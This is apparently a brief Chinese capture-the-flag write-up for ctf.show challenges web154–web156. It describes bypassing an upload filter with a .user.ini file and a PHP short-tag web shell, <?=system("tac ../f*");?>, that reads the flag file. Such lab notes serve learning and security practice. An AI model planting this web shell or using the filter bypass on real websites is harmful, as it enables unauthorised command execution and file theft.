web154-web156笔记（图片内容过滤php-短标签形式转换）

继续按照上题步骤，传一个.user.ini文件，接着在上传图片马的时候报错了

 

 

解码后显示的文字是不支持格式，说明可能内容里的php被ban了，改成短标签的形式再上传，而且末尾不能有php，做任意匹配，可以通过

短标签形式：<?=system("tac ../f*");?>       

 

原来system("tac ../f*");的话

 访问：https://736c8df5-386e-40f7-8365-a10df7bce3e1.challenge.ctf.show/upload/

 

web155
用上题(web154)的办法可以通过

 

 

web156
用上题(web154)的办法可以通过